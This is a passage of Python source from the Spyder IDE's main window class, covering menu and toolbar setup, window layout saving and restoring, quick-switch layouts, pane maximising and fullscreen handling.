add_actions(self.external_tools_menu, self.external_tools_menu_actions) add_actions(self.help_menu, self.help_menu_actions) add_actions(self.main_toolbar, self.main_toolbar_actions) add_actions(self.file_toolbar, self.file_toolbar_actions) add_actions(self.edit_toolbar, self.edit_toolbar_actions) add_actions(self.search_toolbar, self.search_toolbar_actions) add_actions(self.source_toolbar, self.source_toolbar_actions) add_actions(self.debug_toolbar, self.debug_toolbar_actions) add_actions(self.run_toolbar, self.run_toolbar_actions) # Apply all defined shortcuts (plugins + 3rd-party plugins) self.apply_shortcuts() # Emitting the signal notifying plugins that main window menu and # toolbar actions are all defined: self.all_actions_defined.emit() # Window set-up logger.info("Setting up window...") self.setup_layout(default=False) # Show and hide shortcuts in menus for Mac. 
# This is a workaround because we can't disable shortcuts # by setting context=Qt.WidgetShortcut there if sys.platform == 'darwin': for name in ['file', 'edit', 'search', 'source', 'run', 'debug', 'projects', 'tools', 'plugins']: menu_object = getattr(self, name + '_menu') menu_object.aboutToShow.connect( lambda name=name: self.show_shortcuts(name)) menu_object.aboutToHide.connect( lambda name=name: self.hide_shortcuts(name)) if self.splash is not None: self.splash.hide() # Enabling tear off for all menus except help menu if CONF.get('main', 'tear_off_menus'): for child in self.menuBar().children(): if isinstance(child, QMenu) and child != self.help_menu: child.setTearOffEnabled(True) # Menu about to show for child in self.menuBar().children(): if isinstance(child, QMenu): try: child.aboutToShow.connect(self.update_edit_menu) child.aboutToShow.connect(self.update_search_menu) except TypeError: pass logger.info("*** End of MainWindow setup ***") self.is_starting_up = False def post_visible_setup(self): """Actions to be performed only after the main window's `show` method was triggered""" self.restore_scrollbar_position.emit() # [Workaround for Issue 880] # QDockWidget objects are not painted if restored as floating # windows, so we must dock them before showing the mainwindow, # then set them again as floating windows here. for widget in self.floating_dockwidgets: widget.setFloating(True) # In MacOS X 10.7 our app is not displayed after initialized (I don't # know why because this doesn't happen when started from the terminal), # so we need to resort to this hack to make it appear. if running_in_mac_app(): idx = __file__.index(MAC_APP_NAME) app_path = __file__[:idx] subprocess.call(['open', app_path + MAC_APP_NAME]) # Server to maintain just one Spyder instance and open files in it if # the user tries to start other instances with # $ spyder foo.py if (CONF.get('main', 'single_instance') and not self.new_instance and self.open_files_server): t = threading.Thread(target=self.start_open_files_server) t.setDaemon(True) t.start() # Connect the window to the signal emmited by the previous server # when it gets a client connected to it self.sig_open_external_file.connect(self.open_external_file) # Create Plugins and toolbars submenus self.create_plugins_menu() self.create_toolbars_menu() # Update toolbar visibility status self.toolbars_visible = CONF.get('main', 'toolbars_visible') self.load_last_visible_toolbars() # Update lock status self.lock_interface_action.setChecked(self.interface_locked) # Hide Internal Console so that people don't use it instead of # the External or IPython ones if self.console.dockwidget.isVisible() and DEV is None: self.console.toggle_view_action.setChecked(False) self.console.dockwidget.hide() # Show Help and Consoles by default plugins_to_show = [self.ipyconsole] if self.help is not None: plugins_to_show.append(self.help) for plugin in plugins_to_show: if plugin.dockwidget.isVisible(): plugin.dockwidget.raise_() # Show history file if no console is visible if not self.ipyconsole.isvisible: self.historylog.add_history(get_conf_path('history.py')) if self.open_project: self.projects.open_project(self.open_project) else: # Load last project if a project was active when Spyder # was closed self.projects.reopen_last_project() # If no project is active, load last session if self.projects.get_active_project() is None: self.editor.setup_open_files() # Check for spyder updates if DEV is None and CONF.get('main', 'check_updates_on_startup'): self.give_updates_feedback = False 
self.check_updates(startup=True) # Show dialog with missing dependencies self.report_missing_dependencies() # Raise the menuBar to the top of the main window widget's stack # (Fixes issue 3887) self.menuBar().raise_() self.is_setting_up = False def set_window_title(self): """Set window title.""" if DEV is not None: title = u"Spyder %s (Python %s.%s)" % (__version__, sys.version_info[0], sys.version_info[1]) else: title = u"Spyder (Python %s.%s)" % (sys.version_info[0], sys.version_info[1]) if get_debug_level(): title += u" [DEBUG MODE %d]" % get_debug_level() if self.window_title is not None: title += u' -- ' + to_text_string(self.window_title) if self.projects is not None: path = self.projects.get_active_project_path() if path: path = path.replace(get_home_dir(), u'~') title = u'{0} - {1}'.format(path, title) self.base_title = title self.setWindowTitle(self.base_title) def report_missing_dependencies(self): """Show a QMessageBox with a list of missing hard dependencies""" missing_deps = dependencies.missing_dependencies() if missing_deps: QMessageBox.critical(self, _('Error'), _("<b>You have missing dependencies!</b>" "<br><br><tt>%s</tt><br><br>" "<b>Please install them to avoid this message.</b>" "<br><br>" "<i>Note</i>: Spyder could work without some of these " "dependencies, however to have a smooth experience when " "using Spyder we <i>strongly</i> recommend you to install " "all the listed missing dependencies.<br><br>" "Failing to install these dependencies might result in bugs. " "Please be sure that any found bugs are not the direct " "result of missing dependencies, prior to reporting a new " "issue." ) % missing_deps, QMessageBox.Ok) def load_window_settings(self, prefix, default=False, section='main'): """Load window layout settings from userconfig-based configuration with *prefix*, under *section* default: if True, do not restore inner layout""" get_func = CONF.get_default if default else CONF.get window_size = get_func(section, prefix+'size') prefs_dialog_size = get_func(section, prefix+'prefs_dialog_size') if default: hexstate = None else: hexstate = get_func(section, prefix+'state', None) pos = get_func(section, prefix+'position') # It's necessary to verify if the window/position value is valid # with the current screen. 
See issue 3748 width = pos[0] height = pos[1] screen_shape = QApplication.desktop().geometry() current_width = screen_shape.width() current_height = screen_shape.height() if current_width < width or current_height < height: pos = CONF.get_default(section, prefix+'position') is_maximized = get_func(section, prefix+'is_maximized') is_fullscreen = get_func(section, prefix+'is_fullscreen') return hexstate, window_size, prefs_dialog_size, pos, is_maximized, \ is_fullscreen def get_window_settings(self): """Return current window settings Symetric to the 'set_window_settings' setter""" window_size = (self.window_size.width(), self.window_size.height()) is_fullscreen = self.isFullScreen() if is_fullscreen: is_maximized = self.maximized_flag else: is_maximized = self.isMaximized() pos = (self.window_position.x(), self.window_position.y()) prefs_dialog_size = (self.prefs_dialog_size.width(), self.prefs_dialog_size.height()) hexstate = qbytearray_to_str(self.saveState()) return (hexstate, window_size, prefs_dialog_size, pos, is_maximized, is_fullscreen) def set_window_settings(self, hexstate, window_size, prefs_dialog_size, pos, is_maximized, is_fullscreen): """Set window settings Symetric to the 'get_window_settings' accessor""" self.setUpdatesEnabled(False) self.window_size = QSize(window_size[0], window_size[1]) # width,height self.prefs_dialog_size = QSize(prefs_dialog_size[0], prefs_dialog_size[1]) # width,height self.window_position = QPoint(pos[0], pos[1]) # x,y self.setWindowState(Qt.WindowNoState) self.resize(self.window_size) self.move(self.window_position) # Window layout if hexstate: self.restoreState( QByteArray().fromHex( str(hexstate).encode('utf-8')) ) # [Workaround for Issue 880] # QDockWidget objects are not painted if restored as floating # windows, so we must dock them before showing the mainwindow. for widget in self.children(): if isinstance(widget, QDockWidget) and widget.isFloating(): self.floating_dockwidgets.append(widget) widget.setFloating(False) # Is fullscreen? if is_fullscreen: self.setWindowState(Qt.WindowFullScreen) self.__update_fullscreen_action() # Is maximized? 
if is_fullscreen: self.maximized_flag = is_maximized elif is_maximized: self.setWindowState(Qt.WindowMaximized) self.setUpdatesEnabled(True) def save_current_window_settings(self, prefix, section='main', none_state=False): """Save current window settings with *prefix* in the userconfig-based configuration, under *section*""" win_size = self.window_size prefs_size = self.prefs_dialog_size CONF.set(section, prefix+'size', (win_size.width(), win_size.height())) CONF.set(section, prefix+'prefs_dialog_size', (prefs_size.width(), prefs_size.height())) CONF.set(section, prefix+'is_maximized', self.isMaximized()) CONF.set(section, prefix+'is_fullscreen', self.isFullScreen()) pos = self.window_position CONF.set(section, prefix+'position', (pos.x(), pos.y())) self.maximize_dockwidget(restore=True)# Restore non-maximized layout if none_state: CONF.set(section, prefix + 'state', None) else: qba = self.saveState() CONF.set(section, prefix + 'state', qbytearray_to_str(qba)) CONF.set(section, prefix+'statusbar', not self.statusBar().isHidden()) def tabify_plugins(self, first, second): """Tabify plugin dockwigdets""" self.tabifyDockWidget(first.dockwidget, second.dockwidget) # --- Layouts def setup_layout(self, default=False): """Setup window layout""" prefix = 'window' + '/' settings = self.load_window_settings(prefix, default) hexstate = settings[0] self.first_spyder_run = False if hexstate is None: # First Spyder execution: self.setWindowState(Qt.WindowMaximized) self.first_spyder_run = True self.setup_default_layouts('default', settings) # Now that the initial setup is done, copy the window settings, # except for the hexstate in the quick layouts sections for the # default layouts. # Order and name of the default layouts is found in config.py section = 'quick_layouts' get_func = CONF.get_default if default else CONF.get order = get_func(section, 'order') # restore the original defaults if reset layouts is called if default: CONF.set(section, 'active', order) CONF.set(section, 'order', order) CONF.set(section, 'names', order) for index, name, in enumerate(order): prefix = 'layout_{0}/'.format(index) self.save_current_window_settings(prefix, section, none_state=True) # store the initial layout as the default in spyder prefix = 'layout_default/' section = 'quick_layouts' self.save_current_window_settings(prefix, section, none_state=True) self.current_quick_layout = 'default' # Regenerate menu self.quick_layout_set_menu() self.set_window_settings(*settings) for plugin in (self.widgetlist + self.thirdparty_plugins): try: plugin.initialize_plugin_in_mainwindow_layout() except Exception as error: print("%s: %s" % (plugin, str(error)), file=STDERR) traceback.print_exc(file=STDERR) def setup_default_layouts(self, index, settings): """Setup default layouts when run for the first time""" self.maximize_dockwidget(restore=True) self.set_window_settings(*settings) self.setUpdatesEnabled(False) # IMPORTANT: order has to be the same as defined in the config file MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(self.DEFAULT_LAYOUTS) # define widgets locally editor = self.editor console_ipy = self.ipyconsole console_int = self.console outline = self.outlineexplorer explorer_project = self.projects explorer_file = self.explorer explorer_variable = self.variableexplorer plots = self.plots history = self.historylog finder = self.findinfiles help_plugin = self.help helper = self.onlinehelp plugins = self.thirdparty_plugins global_hidden_widgets = [finder, console_int, explorer_project, helper] + plugins global_hidden_toolbars 
= [self.source_toolbar, self.edit_toolbar, self.search_toolbar] # Layout definition # layouts are organized by columns, each colum is organized by rows # widths have to add 1.0, height per column have to add 1.0 # Spyder Default Initial Layout s_layout = {'widgets': [ # column 0 [[explorer_project]], # column 1 [[editor]], # column 2 [[outline]], # column 3 [[help_plugin, explorer_variable, plots, helper, explorer_file, finder] + plugins, [console_int, console_ipy, history]] ], 'width fraction': [0.0, # column 0 width 0.55, # column 1 width 0.0, # column 2 width 0.45], # column 3 width 'height fraction': [[1.0], # column 0, row heights [1.0], # column 1, row heights [1.0], # column 2, row heights [0.46, 0.54]], # column 3, row heights 'hidden widgets': [outline], 'hidden toolbars': [], } r_layout = {'widgets': [ # column 0 [[editor], [console_ipy, console_int]], # column 1 [[explorer_variable, plots, history, outline, finder] + plugins, [explorer_file, explorer_project, help_plugin, helper]] ], 'width fraction': [0.55, # column 0 width 0.45], # column 1 width 'height fraction': [[0.55, 0.45], # column 0, row heights [0.55, 0.45]], # column 1, row heights 'hidden widgets': [outline], 'hidden toolbars': [], } # Matlab m_layout = {'widgets': [ # column 0 [[explorer_file, explorer_project], [outline]], # column 1 [[editor], [console_ipy, console_int]], # column 2 [[explorer_variable, plots, finder] + plugins, [history, help_plugin, helper]] ], 'width fraction': [0.20, # column 0 width 0.40, # column 1 width 0.40], # column 2 width 'height fraction': [[0.55, 0.45], # column 0, row heights [0.55, 0.45], # column 1, row heights [0.55, 0.45]], # column 2, row heights 'hidden widgets': [], 'hidden toolbars': [], } # Vertically split v_layout = {'widgets': [ # column 0 [[editor], [console_ipy, console_int, explorer_file, explorer_project, help_plugin, explorer_variable, plots, history, outline, finder, helper] + plugins] ], 'width fraction': [1.0], # column 0 width 'height fraction': [[0.55, 0.45]], # column 0, row heights 'hidden widgets': [outline], 'hidden toolbars': [], } # Horizontally split h_layout = {'widgets': [ # column 0 [[editor]], # column 1 [[console_ipy, console_int, explorer_file, explorer_project, help_plugin, explorer_variable, plots, history, outline, finder, helper] + plugins] ], 'width fraction': [0.55, # column 0 width 0.45], # column 1 width 'height fraction': [[1.0], # column 0, row heights [1.0]], # column 1, row heights 'hidden widgets': [outline], 'hidden toolbars': [] } # Layout selection layouts = {'default': s_layout, RSTUDIO: r_layout, MATLAB: m_layout, VERTICAL: v_layout, HORIZONTAL: h_layout} layout = layouts[index] widgets_layout = layout['widgets'] widgets = [] for column in widgets_layout : for row in column: for widget in row: if widget is not None: widgets.append(widget) # Make every widget visible for widget in widgets: widget.toggle_view(True) action = widget.toggle_view_action action.setChecked(widget.dockwidget.isVisible()) # Set the widgets horizontally for i in range(len(widgets) - 1): first, second = widgets[i], widgets[i+1] if first is not None and second is not None: self.splitDockWidget(first.dockwidget, second.dockwidget, Qt.Horizontal) # Arrange rows vertically for column in widgets_layout : for i in range(len(column) - 1): first_row, second_row = column[i], column[i+1] if first_row is not None and second_row is not None: self.splitDockWidget(first_row[0].dockwidget, second_row[0].dockwidget, Qt.Vertical) # Tabify for column in widgets_layout : for 
row in column: for i in range(len(row) - 1): first, second = row[i], row[i+1] if first is not None and second is not None: self.tabify_plugins(first, second) # Raise front widget per row row[0].dockwidget.show() row[0].dockwidget.raise_() # Hide toolbars hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars'] for toolbar in hidden_toolbars: if toolbar is not None: toolbar.close() # Hide widgets hidden_widgets = global_hidden_widgets + layout['hidden widgets'] for widget in hidden_widgets: if widget is not None: widget.dockwidget.close() # set the width and height self._layout_widget_info = [] width, height = self.window_size.width(), self.window_size.height() # fix column width # for c in range(len(widgets_layout)): # widget = widgets_layout[c][0][0].dockwidget # min_width, max_width = widget.minimumWidth(), widget.maximumWidth() # info = {'widget': widget, # 'min width': min_width, # 'max width': max_width} # self._layout_widget_info.append(info) # new_width = int(layout['width fraction'][c] * width * 0.95) # widget.setMinimumWidth(new_width) # widget.setMaximumWidth(new_width) # widget.updateGeometry() # fix column height for c, column in enumerate(widgets_layout): for r in range(len(column) - 1): widget = column[r][0] dockwidget = widget.dockwidget dock_min_h = dockwidget.minimumHeight() dock_max_h = dockwidget.maximumHeight() info = {'widget': widget, 'dock min height': dock_min_h, 'dock max height': dock_max_h} self._layout_widget_info.append(info) # The 0.95 factor is to adjust height based on usefull # estimated area in the window new_height = int(layout['height fraction'][c][r]*height*0.95) dockwidget.setMinimumHeight(new_height) dockwidget.setMaximumHeight(new_height) self._custom_layout_timer = QTimer(self) self._custom_layout_timer.timeout.connect(self.layout_fix_timer) self._custom_layout_timer.setSingleShot(True) self._custom_layout_timer.start(5000) def layout_fix_timer(self): """Fixes the height of docks after a new layout is set.""" info = self._layout_widget_info for i in info: dockwidget = i['widget'].dockwidget if 'dock min width' in i: dockwidget.setMinimumWidth(i['dock min width']) dockwidget.setMaximumWidth(i['dock max width']) if 'dock min height' in i: dockwidget.setMinimumHeight(i['dock min height']) dockwidget.setMaximumHeight(i['dock max height']) dockwidget.updateGeometry() self.setUpdatesEnabled(True) @Slot() def toggle_previous_layout(self): """ """ self.toggle_layout('previous') @Slot() def toggle_next_layout(self): """ """ self.toggle_layout('next') def toggle_layout(self, direction='next'): """ """ get = CONF.get names = get('quick_layouts', 'names') order = get('quick_layouts', 'order') active = get('quick_layouts', 'active') if len(active) == 0: return layout_index = ['default'] for name in order: if name in active: layout_index.append(names.index(name)) current_layout = self.current_quick_layout dic = {'next': 1, 'previous': -1} if current_layout is None: # Start from default current_layout = 'default' if current_layout in layout_index: current_index = layout_index.index(current_layout) else: current_index = 0 new_index = (current_index + dic[direction]) % len(layout_index) self.quick_layout_switch(layout_index[new_index]) def quick_layout_set_menu(self): """ """ get = CONF.get names = get('quick_layouts', 'names') order = get('quick_layouts', 'order') active = get('quick_layouts', 'active') ql_actions = [] ql_actions = [create_action(self, _('Spyder Default Layout'), triggered=lambda: self.quick_layout_switch('default'))] for name in order: 
if name in active: index = names.index(name) # closure required so lambda works with the default parameter def trigger(i=index, self=self): return lambda: self.quick_layout_switch(i) qli_act = create_action(self, name, triggered=trigger()) # closure above replaces the following which stopped working # qli_act = create_action(self, name, triggered=lambda i=index: # self.quick_layout_switch(i) ql_actions += [qli_act] self.ql_save = create_action(self, _("Save current layout"), triggered=lambda: self.quick_layout_save(), context=Qt.ApplicationShortcut) self.ql_preferences = create_action(self, _("Layout preferences"), triggered=lambda: self.quick_layout_settings(), context=Qt.ApplicationShortcut) self.ql_reset = create_action(self, _('Reset to spyder default'), triggered=self.reset_window_layout) self.register_shortcut(self.ql_save, "_", "Save current layout") self.register_shortcut(self.ql_preferences, "_", "Layout preferences") ql_actions += [None] ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset] self.quick_layout_menu.clear() add_actions(self.quick_layout_menu, ql_actions) if len(order) == 0: self.ql_preferences.setEnabled(False) else: self.ql_preferences.setEnabled(True) @Slot() def reset_window_layout(self): """Reset window layout to default""" answer = QMessageBox.warning(self, _("Warning"), _("Window layout will be reset to default settings: " "this affects window position, size and dockwidgets.\n" "Do you want to continue?"), QMessageBox.Yes | QMessageBox.No) if answer == QMessageBox.Yes: self.setup_layout(default=True) def quick_layout_save(self): """Save layout dialog""" get = CONF.get set_ = CONF.set names = get('quick_layouts', 'names') order = get('quick_layouts', 'order') active = get('quick_layouts', 'active') dlg = self.dialog_layout_save(self, names) if dlg.exec_(): name = dlg.combo_box.currentText() if name in names: answer = QMessageBox.warning(self, _("Warning"), _("Layout <b>%s</b> will be \ overwritten. 
Do you want to \ continue?") % name, QMessageBox.Yes | QMessageBox.No) index = order.index(name) else: answer = True if None in names: index = names.index(None) names[index] = name else: index = len(names) names.append(name) order.append(name) # Always make active a new layout even if it overwrites an inactive # layout if name not in active: active.append(name) if answer: self.save_current_window_settings('layout_{}/'.format(index), section='quick_layouts') set_('quick_layouts', 'names', names) set_('quick_layouts', 'order', order) set_('quick_layouts', 'active', active) self.quick_layout_set_menu() def quick_layout_settings(self): """Layout settings dialog""" get = CONF.get set_ = CONF.set section = 'quick_layouts' names = get(section, 'names') order = get(section, 'order') active = get(section, 'active') dlg = self.dialog_layout_settings(self, names, order, active) if dlg.exec_(): set_(section, 'names', dlg.names) set_(section, 'order', dlg.order) set_(section, 'active', dlg.active) self.quick_layout_set_menu() def quick_layout_switch(self, index): """Switch to quick layout number *index*""" section = 'quick_layouts' try: settings = self.load_window_settings('layout_{}/'.format(index), section=section) (hexstate, window_size, prefs_dialog_size, pos, is_maximized, is_fullscreen) = settings # The defaults layouts will always be regenerated unless there was # an overwrite, either by rewriting with same name, or by deleting # and then creating a new one if hexstate is None: # The value for hexstate shouldn't be None for a custom saved # layout (ie, where the index is greater than the number of # defaults). See issue 6202. if index != 'default' and index >= self.DEFAULT_LAYOUTS: QMessageBox.critical( self, _("Warning"), _("Error opening the custom layout. Please close" " Spyder and try again. If the issue persists," " then you must use 'Reset to Spyder default' " "from the layout menu.")) return self.setup_default_layouts(index, settings) except cp.NoOptionError: QMessageBox.critical(self, _("Warning"), _("Quick switch layout #%s has not yet " "been defined.") % str(index)) return # TODO: is there any real use in calling the previous layout # setting? 
# self.previous_layout_settings = self.get_window_settings() self.set_window_settings(*settings) self.current_quick_layout = index # make sure the flags are correctly set for visible panes for plugin in (self.widgetlist + self.thirdparty_plugins): action = plugin.toggle_view_action action.setChecked(plugin.dockwidget.isVisible()) # --- Show/Hide toolbars def _update_show_toolbars_action(self): """Update the text displayed in the menu entry.""" if self.toolbars_visible: text = _("Hide toolbars") tip = _("Hide toolbars") else: text = _("Show toolbars") tip = _("Show toolbars") self.show_toolbars_action.setText(text) self.show_toolbars_action.setToolTip(tip) def save_visible_toolbars(self): """Saves the name of the visible toolbars in the .ini file.""" toolbars = [] for toolbar in self.visible_toolbars: toolbars.append(toolbar.objectName()) CONF.set('main', 'last_visible_toolbars', toolbars) def get_visible_toolbars(self): """Collects the visible toolbars.""" toolbars = [] for toolbar in self.toolbarslist: if toolbar.toggleViewAction().isChecked(): toolbars.append(toolbar) self.visible_toolbars = toolbars def load_last_visible_toolbars(self): """Loads the last visible toolbars from the .ini file.""" toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[]) if toolbars_names: dic = {} for toolbar in self.toolbarslist: dic[toolbar.objectName()] = toolbar toolbars = [] for name in toolbars_names: if name in dic: toolbars.append(dic[name]) self.visible_toolbars = toolbars else: self.get_visible_toolbars() self._update_show_toolbars_action() @Slot() def show_toolbars(self): """Show/Hides toolbars.""" value = not self.toolbars_visible CONF.set('main', 'toolbars_visible', value) if value: self.save_visible_toolbars() else: self.get_visible_toolbars() for toolbar in self.visible_toolbars: toolbar.toggleViewAction().setChecked(value) toolbar.setVisible(value) self.toolbars_visible = value self._update_show_toolbars_action() # --- Other def update_execution_state_kernel(self): """Handle execution state of the current console.""" try: self.ipyconsole.update_execution_state_kernel() except AttributeError: return def valid_project(self): """Handle an invalid active project.""" try: path = self.projects.get_active_project_path() except AttributeError: return if bool(path): if not self.projects.is_valid_project(path): if path: QMessageBox.critical( self, _('Error'), _("<b>{}</b> is no longer a valid Spyder project! 
" "Since it is the current active project, it will " "be closed automatically.").format(path)) self.projects.close_project() def free_memory(self): """Free memory after event.""" gc.collect() def plugin_focus_changed(self): """Focus has changed from one plugin to another""" self.update_edit_menu() self.update_search_menu() def show_shortcuts(self, menu): """Show action shortcuts in menu""" for element in getattr(self, menu + '_menu_actions'): if element and isinstance(element, QAction): if element._shown_shortcut is not None: element.setShortcut(element._shown_shortcut) def hide_shortcuts(self, menu): """Hide action shortcuts in menu""" for element in getattr(self, menu + '_menu_actions'): if element and isinstance(element, QAction): if element._shown_shortcut is not None: element.setShortcut(QKeySequence()) def get_focus_widget_properties(self): """Get properties of focus widget Returns tuple (widget, properties) where properties is a tuple of booleans: (is_console, not_readonly, readwrite_editor)""" from spyder.plugins.editor.widgets.editor import TextEditBaseWidget from spyder.plugins.ipythonconsole.widgets import ControlWidget widget = QApplication.focusWidget() textedit_properties = None if isinstance(widget, (TextEditBaseWidget, ControlWidget)): console = isinstance(widget, ControlWidget) not_readonly = not widget.isReadOnly() readwrite_editor = not_readonly and not console textedit_properties = (console, not_readonly, readwrite_editor) return widget, textedit_properties def update_edit_menu(self): """Update edit menu""" widget, textedit_properties = self.get_focus_widget_properties() if textedit_properties is None: # widget is not an editor/console return # !!! Below this line, widget is expected to be a QPlainTextEdit # instance console, not_readonly, readwrite_editor = textedit_properties # Editor has focus and there is no file opened in it if not console and not_readonly and not self.editor.is_file_opened(): return # Disabling all actions to begin with for child in self.edit_menu.actions(): child.setEnabled(False) self.selectall_action.setEnabled(True) # Undo, redo self.undo_action.setEnabled( readwrite_editor \ and widget.document().isUndoAvailable() ) self.redo_action.setEnabled( readwrite_editor \ and widget.document().isRedoAvailable() ) # Copy, cut, paste, delete has_selection = widget.has_selected_text() self.copy_action.setEnabled(has_selection) self.cut_action.setEnabled(has_selection and not_readonly) self.paste_action.setEnabled(not_readonly) # Comment, uncomment, indent, unindent... if not console and not_readonly: # This is the editor and current file is writable for action in self.editor.edit_menu_actions: action.setEnabled(True) def update_search_menu(self): """Update search menu""" # Disabling all actions except the last one # (which is Find in files) to begin with for child in self.search_menu.actions()[:-1]: child.setEnabled(False) widget, textedit_properties = self.get_focus_widget_properties() if textedit_properties is None: # widget is not an editor/console return # !!! 
Below this line, widget is expected to be a QPlainTextEdit # instance console, not_readonly, readwrite_editor = textedit_properties # Find actions only trigger an effect in the Editor if not console: for action in self.search_menu.actions(): try: action.setEnabled(True) except RuntimeError: pass # Disable the replace action for read-only files self.search_menu_actions[3].setEnabled(readwrite_editor) def create_plugins_menu(self): order = ['editor', 'ipython_console', 'variable_explorer', 'help', 'plots', None, 'explorer', 'outline_explorer', 'project_explorer', 'find_in_files', None, 'historylog', 'profiler', 'breakpoints', 'pylint', None, 'onlinehelp', 'internal_console', None] for plugin in self.widgetlist: action = plugin.toggle_view_action action.setChecked(plugin.dockwidget.isVisible()) try: name = plugin.CONF_SECTION pos = order.index(name) except ValueError: pos = None if pos is not None: order[pos] = action else: order.append(action) actions = order[:] for action in order: if type(action) is str: actions.remove(action) self.plugins_menu_actions = actions add_actions(self.plugins_menu, actions) def create_toolbars_menu(self): order = ['file_toolbar', 'run_toolbar', 'debug_toolbar', 'main_toolbar', 'Global working directory', None, 'search_toolbar', 'edit_toolbar', 'source_toolbar'] for toolbar in self.toolbarslist: action = toolbar.toggleViewAction() name = toolbar.objectName() try: pos = order.index(name) except ValueError: pos = None if pos is not None: order[pos] = action else: order.append(action) add_actions(self.toolbars_menu, order) def createPopupMenu(self): menu = QMenu('', self) actions = self.help_menu_actions[:3] + \ [None, self.help_menu_actions[-1]] add_actions(menu, actions) return menu def set_splash(self, message): """Set splash message""" if self.splash is None: return if message: logger.info(message) self.splash.show() self.splash.showMessage(message, Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute, QColor(Qt.white)) QApplication.processEvents() def closeEvent(self, event): """closeEvent reimplementation""" if self.closing(True): event.accept() else: event.ignore() def resizeEvent(self, event): """Reimplement Qt method""" if not self.isMaximized() and not self.fullscreen_flag: self.window_size = self.size() QMainWindow.resizeEvent(self, event) # To be used by the tour to be able to resize self.sig_resized.emit(event) def moveEvent(self, event): """Reimplement Qt method""" if not self.isMaximized() and not self.fullscreen_flag: self.window_position = self.pos() QMainWindow.moveEvent(self, event) # To be used by the tour to be able to move self.sig_moved.emit(event) def hideEvent(self, event): """Reimplement Qt method""" try: for plugin in (self.widgetlist + self.thirdparty_plugins): if plugin.isAncestorOf(self.last_focused_widget): plugin.visibility_changed(True) QMainWindow.hideEvent(self, event) except RuntimeError: QMainWindow.hideEvent(self, event) def change_last_focused_widget(self, old, now): """To keep track of to the last focused widget""" if (now is None and QApplication.activeWindow() is not None): QApplication.activeWindow().setFocus() self.last_focused_widget = QApplication.focusWidget() elif now is not None: self.last_focused_widget = now self.previous_focused_widget = old def closing(self, cancelable=False): """Exit tasks""" if self.already_closed or self.is_starting_up: return True if cancelable and CONF.get('main', 'prompt_on_exit'): reply = QMessageBox.critical(self, 'Spyder', 'Do you really want to exit?', QMessageBox.Yes, QMessageBox.No) if 
reply == QMessageBox.No: return False prefix = 'window' + '/' self.save_current_window_settings(prefix) if CONF.get('main', 'single_instance') and self.open_files_server: self.open_files_server.close() for plugin in (self.widgetlist + self.thirdparty_plugins): plugin.close_window() if not plugin.closing_plugin(cancelable): return False self.dialog_manager.close_all() if self.toolbars_visible: self.save_visible_toolbars() self.lspmanager.shutdown() self.already_closed = True return True def add_dockwidget(self, child): """Add QDockWidget and toggleViewAction""" dockwidget, location = child.create_dockwidget() if CONF.get('main', 'vertical_dockwidget_titlebars'): dockwidget.setFeatures(dockwidget.features()| QDockWidget.DockWidgetVerticalTitleBar) self.addDockWidget(location, dockwidget) self.widgetlist.append(child) @Slot() def close_current_dockwidget(self): widget = QApplication.focusWidget() for plugin in (self.widgetlist + self.thirdparty_plugins): if plugin.isAncestorOf(widget): plugin.toggle_view_action.setChecked(False) break def toggle_lock(self, value): """Lock/Unlock dockwidgets and toolbars""" self.interface_locked = value CONF.set('main', 'panes_locked', value) # Apply lock to panes for plugin in (self.widgetlist + self.thirdparty_plugins): if self.interface_locked: if plugin.dockwidget.isFloating(): plugin.dockwidget.setFloating(False) plugin.dockwidget.setTitleBarWidget(QWidget()) else: plugin.dockwidget.set_title_bar() # Apply lock to toolbars for toolbar in self.toolbarslist: if self.interface_locked: toolbar.setMovable(False) else: toolbar.setMovable(True) def __update_maximize_action(self): if self.state_before_maximizing is None: text = _("Maximize current pane") tip = _("Maximize current pane") icon = ima.icon('maximize') else: text = _("Restore current pane") tip = _("Restore pane to its original size") icon = ima.icon('unmaximize') self.maximize_action.setText(text) self.maximize_action.setIcon(icon) self.maximize_action.setToolTip(tip) @Slot() @Slot(bool) def maximize_dockwidget(self, restore=False): """Shortcut: Ctrl+Alt+Shift+M First call: maximize current dockwidget Second call (or restore=True): restore original window layout""" if self.state_before_maximizing is None: if restore: return # Select plugin to maximize self.state_before_maximizing = self.saveState() focus_widget = QApplication.focusWidget() for plugin in (self.widgetlist + self.thirdparty_plugins): plugin.dockwidget.hide() if plugin.isAncestorOf(focus_widget): self.last_plugin = plugin # Only plugins that have a dockwidget are part of widgetlist, # so last_plugin can be None after the above "for" cycle. 
# For example, this happens if, after Spyder has started, focus # is set to the Working directory toolbar (which doesn't have # a dockwidget) and then you press the Maximize button if self.last_plugin is None: # Using the Editor as default plugin to maximize self.last_plugin = self.editor # Maximize last_plugin self.last_plugin.dockwidget.toggleViewAction().setDisabled(True) self.setCentralWidget(self.last_plugin) self.last_plugin.ismaximized = True # Workaround to solve an issue with editor's outline explorer: # (otherwise the whole plugin is hidden and so is the outline explorer # and the latter won't be refreshed if not visible) self.last_plugin.show() self.last_plugin.visibility_changed(True) if self.last_plugin is self.editor: # Automatically show the outline if the editor was maximized: self.addDockWidget(Qt.RightDockWidgetArea, self.outlineexplorer.dockwidget) self.outlineexplorer.dockwidget.show() else: # Restore original layout (before maximizing current dockwidget) self.last_plugin.dockwidget.setWidget(self.last_plugin) self.last_plugin.dockwidget.toggleViewAction().setEnabled(True) self.setCentralWidget(None) self.last_plugin.ismaximized = False self.restoreState(self.state_before_maximizing) self.state_before_maximizing = None self.last_plugin.get_focus_widget().setFocus() self.__update_maximize_action() def __update_fullscreen_action(self): if self.fullscreen_flag: icon = ima.icon('window_nofullscreen') else: icon = ima.icon('window_fullscreen') if is_text_string(icon): icon = get_icon(icon) self.fullscreen_action.setIcon(icon) @Slot() def toggle_fullscreen(self): if self.fullscreen_flag: self.fullscreen_flag = False if os.name == 'nt': self.setWindowFlags( self.windowFlags() ^ (Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint)) self.setGeometry(self.saved_normal_geometry) self.showNormal() if self.maximized_flag: self.showMaximized() else: self.maximized_flag = self.isMaximized() self.fullscreen_flag = True self.saved_normal_geometry = self.normalGeometry() if os.name == 'nt': # Due to limitations of the Windows DWM, compositing is not # handled correctly for OpenGL based windows when going into # full screen mode, so we need to use this workaround. # See Issue #4291. self.setWindowFlags(self.windowFlags() | Qt.FramelessWindowHint | 